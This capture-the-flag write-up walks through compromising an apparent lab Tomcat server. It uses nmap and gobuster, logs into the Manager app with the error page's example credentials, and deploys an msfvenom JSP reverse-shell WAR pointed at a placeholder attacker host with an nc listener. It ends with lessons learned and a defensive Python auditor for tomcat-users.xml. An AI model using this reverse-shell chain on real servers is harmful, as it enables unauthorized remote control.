Enumeration
nmap -p- 10.129.136.9
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-22 08:13 CDT
Nmap scan report for 10.129.136.9
Host is up (0.070s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 108.21 seconds
Only port 8080 came back, so let's dig further into that port.
Service Enumeration - port:8080
nmap -A -p8080 10.129.136.9
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-22 08:16 CDT
Nmap scan report for 10.129.136.9
Host is up (0.071s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2012|8|Phone|7 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Embedded Standard 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 70.54 ms 10.10.14.1
2 70.77 ms 10.129.136.9
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.87 seconds
We found that the service running is Tomcat. Let's check for directories, but first, let's browse to the page.
Now from the webpage, we can confirm the Tomcat version to be Tomcat/7.0.88.
Now our gobuster scan is back:
gobuster dir -u http://10.129.23.21:8080 -w /usr/share/wordlists/dirb/common.txt -x php,html,txt,sh,pl,cgi,aspx
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.23.21:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,sh,pl,cgi,aspx,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/docs (Status: 302) [Size: 0] [--> /docs/]
/examples (Status: 302) [Size: 0] [--> /examples/]
/favicon.ico (Status: 200) [Size: 21630]
/host-manager (Status: 302) [Size: 0] [--> /host-manager/]
/manager (Status: 302) [Size: 0] [--> /manager/]
Progress: 36912 / 36920 (99.98%)
===============================================================
Finished
===============================================================
When we attempt to check /manager and /host-manager, we hit a login wall.
I checked online for default credentials and found admin:admin. But when I tried admin:admin, I got an error page that changed everything.
The error page itself is the pointer: "For example, to add the manager-gui role to a user named tomcat with a password of s3cret, add the following to the config file listed"
I decided to try tomcat as the username and s3cret as the password. Like magic, it worked; we are in.
Once logged in, I discovered that I can upload a WAR file, and my brain started thinking about how to get a reverse shell with the file upload.
I created a .war payload with msfvenom:
Exploitation:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=attacker_ip LPORT=attacker_port -f war -o shell.war
The payload is ready, let's upload it. Before uploading the file, I started an ncat listener on my local machine on the port indicated in the msfvenom payload.
nc -lvnp 4466
Now, ready? go! File uploaded:
Successfully uploaded:
With our ncat listener already listening, let's trigger the shell by navigating to the deployed application. We should pop a shell.
We pop a shell, and we are authority\system, which means no privilege escalation is needed.
Lesson learned
- Error messages should never leak sensitive data (credentials, paths, configs)
- Debugging information must be strictly separated from production environments
- What seems helpful for developers can be critical intel for attackers
- Secure defaults and proper error handling are part of your attack surface
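As an added example (not part of this write-up), the following Python script audits a Tomcat tomcat-users.xml for exactly the weakness exploited above: privileged manager roles assigned to the documentation-example credentials that the error page quotes, or to short passwords. The sample config, the 12-character length threshold and the role list are assumptions made for this example.

```python
# Added example: audit tomcat-users.xml for weak or documentation-example
# credentials on privileged Tomcat Manager roles. Not code from the original post.
import xml.etree.ElementTree as ET

# Credentials quoted on Tomcat's manager error page / docs (tomcat:s3cret) and
# the common admin:admin pair tried in the write-up.
DOC_EXAMPLE_CREDS = {("tomcat", "s3cret"), ("admin", "admin")}
# Roles that grant deployment or administrative access to the manager apps.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}
MIN_PASSWORD_LEN = 12  # assumed policy threshold for this example

# Constructed sample config; a real file lives at $CATALINA_BASE/conf/tomcat-users.xml.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="deploy" password="Xk9#pLq2!vN7" roles="manager-script"/>
  <user username="guest" password="admin" roles="role1"/>
</tomcat-users>
"""


def audit_tomcat_users(xml_text):
    """Return a list of (username, reason) findings for users holding a
    privileged role with documentation-example or short credentials."""
    root = ET.fromstring(xml_text)
    findings = []
    # The file may or may not declare the tomcat.apache.org namespace, so
    # compare on the local tag name only.
    for elem in root.iter():
        if elem.tag.split("}")[-1] != "user":
            continue
        name = elem.get("username") or elem.get("name") or ""
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if not privileged:
            continue  # unprivileged accounts are out of scope for this check
        if (name, password) in DOC_EXAMPLE_CREDS:
            findings.append((name, "documentation-example credentials with roles "
                             + ", ".join(privileged)))
        elif len(password) < MIN_PASSWORD_LEN:
            findings.append((name, "short password (%d chars) with roles %s"
                             % (len(password), ", ".join(privileged))))
    return findings
```

Run it against each Tomcat instance's tomcat-users.xml; any finding means the Manager app is one guessed login away from arbitrary WAR deployment.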